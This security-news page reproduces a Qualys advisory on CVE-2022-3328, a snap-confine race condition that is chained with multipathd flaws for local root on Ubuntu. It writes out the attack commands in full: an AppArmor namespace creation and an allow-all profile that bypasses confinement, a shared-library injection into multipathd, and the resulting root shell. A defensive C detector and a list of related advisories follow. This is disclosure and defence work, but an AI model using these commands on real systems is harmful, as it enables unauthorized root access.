snap-confine must_mkdir_and_open_with_perms() Race Condition
Qualys discovered a race condition (CVE-2022-3328) in snap-confine, a SUID-root program installed by default on Ubuntu. In this advisory, they tell the story of this vulnerability (which was introduced in February 2022 by the patch for CVE-2021-44731) and detail how they exploited it in Ubuntu Server (a local privilege escalation, from any user to root) by combining it with two vulnerabilities in multipathd (an authorization bypass and a symlink attack, CVE-2022-41974 and CVE-2022-41973).
Qualys Security Advisory

Race condition in snap-confine's must_mkdir_and_open_with_perms()
(CVE-2022-3328)


========================================================================
Contents
========================================================================

Summary
Background
Exploitation
Acknowledgments
Timeline


    I can't help but feel a missed opportunity to integrate lyrics from
    one of the best songs ever: [SNAP! - The Power (Official Video)]
        -- https://twitter.com/spendergrsec/status/1494420041076461570


========================================================================
Summary
========================================================================

We discovered a race condition (CVE-2022-3328) in snap-confine, a
SUID-root program installed by default on Ubuntu. In this advisory, we
tell the story of this vulnerability (which was introduced in February
2022 by the patch for CVE-2021-44731) and detail how we exploited it in
Ubuntu Server (a local privilege escalation, from any user to root) by
combining it with two vulnerabilities in multipathd (an authorization
bypass and a symlink attack, CVE-2022-41974 and CVE-2022-41973):

https://www.qualys.com/2022/10/24/leeloo-multipath/leeloo-multipath.txt


========================================================================
Background
========================================================================

    Like the crack of the whip, I Snap! attack
    Radical mind, day and night all the time
        -- SNAP! - The Power

In February 2022, we published CVE-2021-44731 in our "Lemmings" advisory
(https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt):
to set up a snap's sandbox, snap-confine created the temporary directory
/tmp/snap.$SNAP_NAME or reused it if it already existed, even if it did
not belong to root; a local attacker could race against snap-confine,
retain control over /tmp/snap.$SNAP_NAME, and eventually obtain full
root privileges.

This vulnerability was patched by commit acb2b4c ("cmd/snap-confine:
Prevent user-controlled race in setup_private_mount"), which introduced
a new helper function, must_mkdir_and_open_with_perms():

------------------------------------------------------------------------
142 static void setup_private_mount(const char *snap_name)
...
169     sc_must_snprintf(base_dir, sizeof(base_dir), "/tmp/snap.%s", snap_name);
...
176     base_dir_fd = must_mkdir_and_open_with_perms(base_dir, 0, 0, 0700);
------------------------------------------------------------------------
 55 static int must_mkdir_and_open_with_perms(const char *dir, uid_t uid, gid_t gid,
 56                                           mode_t mode)
 ..
 61 mkdir:
 ..
 67     if (mkdir(dir, 0700) < 0 && errno != EEXIST) {
 ..
 70     fd = open(dir, O_RDONLY | O_DIRECTORY | O_CLOEXEC | O_NOFOLLOW);
 ..
 81     if (fstat(fd, &st) < 0) {
 ..
 84     if (st.st_uid != uid || st.st_gid != gid
 85         || st.st_mode != (S_IFDIR | mode)) {
...
130         if (rename(dir, random_dir) < 0) {
...
135         goto mkdir;
------------------------------------------------------------------------

- the temporary directory /tmp/snap.$SNAP_NAME is created at line 67, if
  it does not exist already;

- if it already exists, and if it does not belong to root (at line 84),
  then it is moved out of the way (at line 130) by rename()ing it to a
  random directory in /tmp, and its creation is retried (at line 135).

When we reviewed this patch back in December 2021, we felt very nervous
about this rename() call (because it allows a local attacker to rename()
a directory they do not own), and we advised the Ubuntu Security Team to
either not reuse the directory /tmp/snap.$SNAP_NAME at all, or to create
it in a non-world-writable directory instead of /tmp, or at least to use
renameat2(RENAME_EXCHANGE) instead of rename(). Unfortunately, all of
these ideas were deemed impractical (for example, renameat2() is not
supported by older kernel and glibc versions); moreover, we (Qualys)
failed to come up with a feasible attack plan against this rename()
call, so the patch was kept in its current form.

After the release of Ubuntu 22.04 in April 2022, we decided to revisit
snap-confine and its recent hardening changes, and we finally found a
way to exploit the rename() call in must_mkdir_and_open_with_perms().
========================================================================
Exploitation
========================================================================

    It's getting, it's getting, it's getting kinda heavy
    It's getting, it's getting, it's getting kinda hectic
        -- SNAP! - The Power

The three key ideas to exploit the rename() of /tmp/snap.$SNAP_NAME are:

1/ snap-confine operates in /tmp to create a snap's temporary directory
(/tmp/snap.$SNAP_NAME in setup_private_mount()), but it also operates in
/tmp to create the snap's *root* directory (/tmp/snap.rootfs_XXXXXX in
sc_bootstrap_mount_namespace(), where all of the Xs are randomized by
mkdtemp()), and the string rootfs_XXXXXX is accepted as a valid snap
instance name by sc_instance_name_validate() (when all of the Xs are
lowercase alphanumeric):

------------------------------------------------------------------------
286 static void sc_bootstrap_mount_namespace(const struct sc_mount_config *config)
...
288     char scratch_dir[] = "/tmp/snap.rootfs_XXXXXX";
...
291     if (mkdtemp(scratch_dir) == NULL) {
...
303     sc_do_mount(scratch_dir, scratch_dir, NULL, MS_BIND, NULL);
...
319     sc_do_mount(config->rootfs_dir, scratch_dir, NULL, MS_REC | MS_BIND,
...
331     for (const struct sc_mount * mnt = config->mounts; mnt->path != NULL;
...
342             sc_must_snprintf(dst, sizeof dst, "%s/%s", scratch_dir,
343                              mnt->path);
...
352             sc_do_mount(mnt->path, dst, NULL, MS_REC | MS_BIND,
------------------------------------------------------------------------

2/ We therefore execute two instances of snap-confine in parallel:

- we block the first snap-confine immediately after it creates its root
  directory /tmp/snap.rootfs_XXXXXX at line 291 (we reliably win this
  race condition by "single-stepping" snap-confine, as explained in our
  "Lemmings" advisory);

- we execute the second snap-confine with a snap instance name of
  rootfs_XXXXXX -- i.e., the temporary directory /tmp/snap.$SNAP_NAME of
  this second snap-confine is the root directory /tmp/snap.rootfs_XXXXXX
  of the first snap-confine;

- we kill this second snap-confine immediately after it rename()s its
  temporary directory /tmp/snap.$SNAP_NAME -- i.e., the root directory
  /tmp/snap.rootfs_XXXXXX of the first snap-confine -- at line 130 (we
  reliably win this race condition with inotify, as explained in our
  "Lemmings" advisory);

- we re-create the directory /tmp/snap.rootfs_XXXXXX ourselves, and
  resume the execution of the first snap-confine, whose root directory
  now belongs to us.

3/ We can therefore create an arbitrary symlink
/tmp/snap.rootfs_XXXXXX/tmp, and sc_bootstrap_mount_namespace() will
bind-mount the real /tmp directory (which is world-writable) onto any
directory in the filesystem (because mount() will follow our arbitrary
symlink at line 352).

This ability will eventually allow us to obtain full root privileges,
but we must first solve three problems:

------------------------------------------------------------------------

Problem a/ We cannot trick snap-confine into rename()ing
/tmp/snap.rootfs_XXXXXX, because this directory belongs to root and
must_mkdir_and_open_with_perms() rename()s it only if it does not belong
to root!

This problem solves itself naturally: indeed, /tmp/snap.rootfs_XXXXXX
belongs to the user root, but it belongs to the group of our own user,
so must_mkdir_and_open_with_perms() rename()s it because it does not
belong to the group root (at line 84).

------------------------------------------------------------------------

Problem b/ We cannot trick snap-confine into following our symlink
/tmp/snap.rootfs_XXXXXX/tmp, because sc_bootstrap_mount_namespace()
bind-mounts a read-only squashfs onto /tmp/snap.rootfs_XXXXXX (at line
319): if we create our symlink before this bind-mount, then it becomes
covered by the squashfs; and we cannot create our symlink after this
bind-mount, because the squashfs is read-only and belongs to root!

The "Prologue: CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount"
of our "Lemmings" advisory suggests a solution to this problem: we must
unmount /tmp/snap.rootfs_XXXXXX each time sc_bootstrap_mount_namespace()
bind-mounts it (at lines 303 and 319). The "(deleted)" technique we used
in "Lemmings" (CVE-2021-3996 in util-linux) was patched in January 2022,
but we found a surprisingly simple workaround:

we mount a FUSE filesystem onto /tmp/snap.rootfs_XXXXXX, immediately
after we re-create this directory ourselves; this allows us to unmount
(with fusermount -u -z) any subsequent bind-mounts (even if they belong
to root), because fusermount does not check that our FUSE filesystem is
indeed the most recently mounted filesystem on /tmp/snap.rootfs_XXXXXX.

------------------------------------------------------------------------

Problem c/ We cannot trick snap-confine into bind-mounting the real /tmp
onto an arbitrary directory in the filesystem (at line 352), because
such a bind-mount is forbidden by snap-confine's AppArmor profile!

To solve this problem, we must bypass AppArmor completely, but the
technique we used in our "Lemmings" advisory (we wrapped snap-confine's
execution in an AppArmor profile that was in "complain" mode, not in
"enforce" mode) was patched in February 2022 (by commits 26eed65 and
4a2eb78, "ensure that snap-confine is in strict confinement" and
"Tighten AppArmor label check"):

now, snap-confine's execution must be wrapped in an AppArmor profile
that is in "enforce" mode and whose label matches the regular expression
"^(/snap/(snapd|core)/x?[0-9]+/usr/lib|/usr/lib(exec)?)/snapd/snap-confine$".

We were about to give up on trying to exploit snap-confine, when we
discovered CVE-2022-41974 and CVE-2022-41973 in multipathd (which is
installed by default on Ubuntu Server): these two vulnerabilities allow
us to create a directory named "failed_wwids" (user root, group root,
mode 0700) anywhere in the filesystem, and we were able to transform
this very limited directory creation into a complete AppArmor bypass.

AppArmor supports policy namespaces that are loosely related to kernel
user namespaces; by default, no AppArmor namespaces exist:

------------------------------------------------------------------------
$ ls -la /sys/kernel/security/apparmor/policy/namespaces
total 0
drwxr-xr-x 2 root root 0 Aug 6 12:42 .
drwxr-xr-x 5 root root 0 Aug 6 12:42 ..
------------------------------------------------------------------------

However, we (attackers) can create an AppArmor namespace "failed_wwids"
by exploiting CVE-2022-41974 and CVE-2022-41973 in multipathd:

------------------------------------------------------------------------
$ ln -s /sys/kernel/security/apparmor/policy/namespaces /dev/shm/multipath

$ multipathd list devices | grep 'whitelisted, unmonitored'
    sda1 devnode whitelisted, unmonitored
    ...

$ multipathd list list path sda1
fail

$ ls -la /sys/kernel/security/apparmor/policy/namespaces
total 0
drwxr-xr-x 3 root root 0 Aug 6 12:42 .
drwxr-xr-x 5 root root 0 Aug 6 12:42 ..
drwx------ 5 root root 0 Aug 6 13:38 failed_wwids
------------------------------------------------------------------------

Then, we can enter this AppArmor namespace by creating and entering an
unprivileged user namespace:

------------------------------------------------------------------------
$ aa-exec -n failed_wwids -p unconfined -- unshare -U -r /bin/sh
------------------------------------------------------------------------

Inside this namespace, we can create an AppArmor profile labeled
"/usr/lib/snapd/snap-confine" that is in "enforce" mode and allows all
possible operations:

------------------------------------------------------------------------
# apparmor_parser -K -a << "EOF"
/usr/lib/snapd/snap-confine (enforce) {
    capability,
    network,
    mount,
    remount,
    umount,
    pivot_root,
    ptrace,
    signal,
    dbus,
    unix,
    file,
    change_profile,
}
EOF
------------------------------------------------------------------------

Back in the initial namespace, we check that our "allow all" AppArmor
profile still exists:

------------------------------------------------------------------------
# aa-status
apparmor module is loaded.
32 profiles are loaded.
32 profiles are in enforce mode.
   ...
   :failed_wwids:/usr/lib/snapd/snap-confine
------------------------------------------------------------------------

Last, we make sure that snap-confine accepts our "allow all" AppArmor
profile (i.e., AppArmor is bypassed, and snap-confine is effectively
unconfined):

------------------------------------------------------------------------
$ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -n failed_wwids -p /usr/lib/snapd/snap-confine -- /usr/lib/snapd/snap-confine --base lxd snap.lxd.daemon /nonexistent
...
DEBUG: apparmor label on snap-confine is: /usr/lib/snapd/snap-confine
DEBUG: apparmor mode is: enforce
------------------------------------------------------------------------

We can therefore bind-mount /tmp onto an arbitrary directory in the
filesystem (by exploiting CVE-2022-3328); since we already depend on
multipathd to bypass AppArmor, we bind-mount /tmp onto /lib/multipath,
create our own shared library /lib/multipath/libchecktur.so, shutdown
multipathd (by exploiting CVE-2022-41974), restart multipathd (through
its Unix socket), and finally obtain full root privileges (because
multipathd executes our shared library as root when it restarts):

------------------------------------------------------------------------
$ grep multipath /proc/self/mountinfo | wc
      0       0       0

$ gcc -o CVE-2022-3328 CVE-2022-3328.c
$ ./CVE-2022-3328
scratch directory for constructing namespace: /tmp/snap.rootfs_0j4u9c

$ grep multipath /proc/self/mountinfo
1395 29 253:0 /tmp /usr/lib/multipath rw,relatime shared:1 - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
...

$ gcc -fpic -shared -o /lib/multipath/libchecktur.so libtmpsh.c

$ ps -ef | grep 'multipath[d]'
root         371       1  0 12:42 ?        00:00:00 /sbin/multipathd -d -s

$ multipathd list list add del switch sus resu rei fai resi rese rel forc dis rest paths maps path P map P gro P rec dae statu stats top con bla dev raw wil quit
ok

$ ps -ef | grep 'multipath[d]' | wc
      0       0       0

$ ls -l /tmp/sh
ls: cannot access '/tmp/sh': No such file or directory

$ multipathd list daemon
error -104 receiving packet

$ ls -l /tmp/sh
-rwsr-xr-x 1 root root 125688 Aug 6 14:55 /tmp/sh

$ /tmp/sh -p
# id
uid=65534(nobody) gid=65534(nogroup) euid=0(root) groups=65534(nogroup)
                                     ^^^^^^^^^^^^
------------------------------------------------------------------------


========================================================================
Acknowledgments
========================================================================

We thank the Ubuntu security team (Alex Murray and Seth Arnold in
particular) and the snapd team for their hard work on this snap-confine
vulnerability. We also thank the members of linux-distros@openwall.


========================================================================
Timeline
========================================================================

2022-08-23: Contacted [email protected].
[date lost]: Contacted [email protected].
[date lost]: Coordinated Release Date (17:00 UTC).
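Two host-side checks for the traces this chain leaves behind, as an added example written for this page and not part of the Qualys advisory: a bind-mount whose root is the filesystem's /tmp sitting on a system path (the /usr/lib/multipath line in the mountinfo output above), and a profile inside an AppArmor policy namespace (the ":failed_wwids:" entry in the aa-status output above). The list of system paths, the extra "tmpfs" rule and the non-advisory sample lines are assumptions.

```c
/* Added example, not part of the Qualys advisory: two checks for the
 * artefacts the chain leaves behind. (1) /proc/self/mountinfo: a mount
 * whose root is the filesystem's /tmp (or any tmpfs) on a system path.
 * (2) aa-status: a profile inside a policy namespace (":ns:label"),
 * which a default Ubuntu host has none of. The path list and the tmpfs
 * rule are heuristics chosen here, not anything the advisory states. */
#include <stdio.h>
#include <string.h>

/* mountinfo fields: id parent maj:min root mountpoint opts... - fstype src */
int suspicious_tmp_mount(const char *line)
{
    static const char *sys_paths[] = { "/usr/lib", "/lib", "/usr/lib64",
        "/lib64", "/usr/bin", "/bin", "/usr/sbin", "/sbin", "/etc", NULL };
    char root[256], mnt[256], fstype[64] = "";
    if (sscanf(line, "%*d %*d %*d:%*d %255s %255s", root, mnt) != 2)
        return 0;                                /* malformed line */
    const char *sep = strstr(line, " - ");       /* end of optional fields */
    if (sep != NULL)
        sscanf(sep + 3, "%63s", fstype);
    int tmp_subtree = strcmp(root, "/tmp") == 0 || strncmp(root, "/tmp/", 5) == 0;
    if (!tmp_subtree && strcmp(fstype, "tmpfs") != 0)
        return 0;
    for (int i = 0; sys_paths[i] != NULL; i++) {
        size_t n = strlen(sys_paths[i]);
        if (strncmp(mnt, sys_paths[i], n) == 0 && (mnt[n] == '\0' || mnt[n] == '/'))
            return 1;                            /* world-writable tree on a system path */
    }
    return 0;
}

/* aa-status prints namespaced profiles as ":namespace:label". Returns 1 and
 * copies the namespace name into ns (nslen bytes) if the line is one. */
int namespaced_profile(const char *line, char *ns, size_t nslen)
{
    while (*line == ' ' || *line == '\t')
        line++;
    if (*line != ':')
        return 0;
    const char *end = strchr(line + 1, ':');
    if (end == NULL || end == line + 1)
        return 0;
    size_t len = (size_t)(end - line - 1);
    if (len >= nslen)
        len = nslen - 1;
    memcpy(ns, line + 1, len);
    ns[len] = '\0';
    return 1;
}

static int is_namespaced(const char *line)
{
    char ns[64];
    return namespaced_profile(line, ns, sizeof ns);
}

/* 1 if the line is a namespaced profile whose namespace equals "expected". */
int namespace_is(const char *line, const char *expected)
{
    char ns[64];
    return namespaced_profile(line, ns, sizeof ns) && strcmp(ns, expected) == 0;
}

/* Constructed samples: the advisory's mountinfo and aa-status lines mixed
 * with ordinary ones (the ordinary lines are made up for this example). */
static const char *sample_mountinfo[] = {
    "29 1 253:0 / / rw,relatime shared:1 - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw",
    "40 29 0:35 / /tmp rw,nosuid,nodev shared:21 - tmpfs tmpfs rw",
    "51 29 7:3 / /snap/lxd/22923 ro,nodev,relatime shared:27 - squashfs /dev/loop3 ro",
    "1395 29 253:0 /tmp /usr/lib/multipath rw,relatime shared:1 - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw",
    NULL
};
static const char *sample_aa_status[] = {
    "apparmor module is loaded.",
    "32 profiles are loaded.",
    "32 profiles are in enforce mode.",
    "   /usr/lib/snapd/snap-confine",
    "   :failed_wwids:/usr/lib/snapd/snap-confine",
    NULL
};

int count_hits(const char *const *lines, int (*check)(const char *))
{
    int hits = 0;
    for (int i = 0; lines[i] != NULL; i++)
        hits += check(lines[i]);
    return hits;
}

int main(void)
{
    printf("sample mountinfo hits: %d\n", count_hits(sample_mountinfo, suspicious_tmp_mount));
    printf("sample aa-status hits: %d\n", count_hits(sample_aa_status, is_namespaced));
    /* Live, read-only check of this host's mount table (no privileges needed). */
    FILE *f = fopen("/proc/self/mountinfo", "r");
    char line[1024];
    while (f != NULL && fgets(line, sizeof line, f) != NULL)
        if (suspicious_tmp_mount(line))
            printf("suspicious mount: %s", line);
    if (f != NULL)
        fclose(f);
    return 0;
}
```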
Related news
Race condition in snap-confine's must_mkdir_and_open_with_perms()
Gentoo Linux Security Advisory 202401-8 - Multiple vulnerabilities have been discovered in util-linux which can lead to denial of service or information disclosure. Versions greater than or equal to 2.37.4 are affected.
Gentoo Linux Security Advisory 202311-6 - Multiple vulnerabilities have been discovered in multipath-tools, the worst of which can lead to root privilege escalation. Versions greater than or equal to 0.9.3 are affected.
Red Hat Security Advisory 2023-3356-01 - Red Hat Advanced Cluster Management for Kubernetes 2.5.9 images Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in. This advisory contains the container images for Red Hat Advanced Cluster Management for Kubernetes, which fix several bugs.
Multicluster Engine for Kubernetes 2.0.9 General Availability release images, which fix security issues and update container images. Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE links in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-32313: A flaw was found in the vm2. After making a vm, the inspect method is read-write for console.log, which allows an attacker to edit options for console.log. This issue impacts the integrity by changing the log subsystem. * CVE-2023-32314: A flaw was found in the vm2 sandbox. When a host o...
Red Hat Security Advisory 2023-3325-01 - Multicluster Engine for Kubernetes 2.1.7 images Multicluster engine for Kubernetes provides the foundational components that are necessary for the centralized management of multiple Kubernetes-based clusters across data centers, public clouds, and private clouds. You can use the engine to create new Red Hat OpenShift Container Platform clusters or to bring existing Kubernetes-based clusters under management by importing them. After the clusters are managed, you can use the APIs that are provided by the engine to distribute configuration based on placement policy.
Multicluster Engine for Kubernetes 2.1.7 General Availability release images, which address security issues and update container images. Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE links in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-32313: A flaw was found in the vm2. After making a vm, the inspect method is read-write for console.log, which allows an attacker to edit options for console.log. This issue impacts the integrity by changing the log subsystem. * CVE-2023-32314: A flaw was found in the vm2 sandbox. When a ho...
Red Hat Security Advisory 2023-3296-01 - Multicluster Engine for Kubernetes 2.2.4 images Multicluster engine for Kubernetes provides the foundational components that are necessary for the centralized management of multiple Kubernetes-based clusters across data centers, public clouds, and private clouds. You can use the engine to create new Red Hat OpenShift Container Platform clusters or to bring existing Kubernetes-based clusters under management by importing them. After the clusters are managed, you can use the APIs that are provided by the engine to distribute configuration based on placement policy.
Multicluster Engine for Kubernetes 2.2.4 General Availability release images, which fix security issues and update container images. Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE links in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-32313: A flaw was found in the vm2. After making a vm, the inspect method is read-write for console.log, which allows an attacker to edit options for console.log. This issue impacts the integrity by changing the log subsystem. * CVE-2023-32314: A flaw was found in the vm2 sandbox. When a host ...
Red Hat Security Advisory 2023-2948-01 - The device-mapper-multipath packages provide tools that use the device-mapper multipath kernel module to manage multipath devices. Issues addressed include an insecure handling vulnerability.
An update for device-mapper-multipath is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-41973: A vulnerability was found in the device-mapper-multipath. The device-mapper-multipath allows local users to obtain root access, in conjunction with CVE-2022-41974. Local users that are able to access /dev/shm can change symlinks in multipathd due to incorrect symlink handling, which may lead to controlled file writes outside of th...
An update for device-mapper-multipath is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-41973: A vulnerability was found in the device-mapper-multipath. The device-mapper-multipath allows local users to obtain root access, in conjunction with CVE-2022-41974. Local users that are able to access /dev/shm can change symlinks in multipathd due to incorrect symlink handling, which may lead to controlled file writes outside of th...
Debian Linux Security Advisory 5366-1 - The Qualys Research Labs reported an authorization bypass (CVE-2022-41974) and a symlink attack (CVE-2022-41973) in multipath-tools, a set of tools to drive the Device Mapper multipathing driver, which may result in local privilege escalation.
Red Hat Security Advisory 2023-0795-01 - Submariner 0.13.3 packages that fix various bugs and add various enhancements that are now available for Red Hat Advanced Cluster Management for Kubernetes version 2.6.
Hello everyone! Great news for my open source Scanvus project! You can now perform vulnerability checks on Linux hosts and docker images not only using the Vulners.com API, but also with the Vulns.io VM API. It’s especially nice that all the code to support the new API was written and contributed by colleagues from Vulns.io. […]
The maintainers of the FreeBSD operating system have released updates to remediate a security vulnerability impacting the ping module that could be potentially exploited to crash the program or trigger remote code execution. The issue, assigned the identifier CVE-2022-23093, impacts all supported versions of FreeBSD and concerns a stack-based buffer overflow vulnerability in the ping service. "
Debian Linux Security Advisory 5292-1 - The Qualys Research Team discovered a race condition in the snapd-confine binary which could result in local privilege escalation.
Ubuntu Security Notice 5753-1 - The Qualys Research Team discovered that a race condition existed in the snapd snap-confine binary when preparing the private /tmp mount for a snap. A local attacker could possibly use this issue to escalate privileges and execute arbitrary code.
Ubuntu Security Notice 5731-1 - It was discovered that multipath-tools incorrectly handled symlinks. A local attacker could possibly use this issue, in combination with other issues, to escalate privileges. This issue only affected Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 22.10. It was discovered that multipath-tools incorrectly handled access controls. A local attacker could possibly use this issue, in combination with other issues, to escalate privileges.
An update for device-mapper-multipath is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-3787: device-mapper-multipath: Regression of CVE-2022-41974 fix in Red Hat Enterprise Linux
Red Hat Security Advisory 2022-7928-01 - The device-mapper-multipath packages provide tools that use the device-mapper multipath kernel module to manage multipath devices.
An update for device-mapper-multipath is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-3787: device-mapper-multipath: Regression of CVE-2022-41974 fix in Red Hat Enterprise Linux
The Qualys Research Team has discovered authorization bypass and symlink vulnerabilities in multipathd. The authorization bypass was introduced in version 0.7.0 and the symlink vulnerability was introduced in version 0.7.7.
multipath-tools 0.7.7 through 0.9.x before 0.9.2 allows local users to obtain root access, as exploited in conjunction with CVE-2022-41974. Local users able to access /dev/shm can change symlinks in multipathd due to incorrect symlink handling, which could lead to controlled file writes outside of the /dev/shm directory. This could be used indirectly for local privilege escalation to root.
Red Hat Security Advisory 2022-7185-01 - The device-mapper-multipath packages provide tools that use the device-mapper multipath kernel module to manage multipath devices. Issues addressed include a bypass vulnerability.
Red Hat Security Advisory 2022-7192-01 - The device-mapper-multipath packages provide tools that use the device-mapper multipath kernel module to manage multipath devices. Issues addressed include a bypass vulnerability.
An update for device-mapper-multipath is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-41974: device-mapper-multipath: Authorization bypass, multipathd daemon listens for client connections on an abstract Unix socket
An update for device-mapper-multipath is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-41974: device-mapper-multipath: Authorization bypass, multipathd daemon listens for client connections on an abstract Unix socket
An update for device-mapper-multipath is now available for Red Hat Enterprise Linux 8.1 Update Services for SAP Solutions. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-41974: device-mapper-multipath: Authorization bypass, multipathd daemon listens for client connections on an abstract Unix socket
A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems.
A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems.
A race condition existed in the snapd 2.54.2 snap-confine binary when preparing a private mount namespace for a snap. This could allow a local attacker to gain root privileges by bind-mounting their own contents inside the snap's private mount namespace and causing snap-confine to execute arbitrary code and hence gain privilege escalation. Fixed in snapd versions 2.54.3+18.04, 2.54.3+20.04 and 2.54.3+21.10.1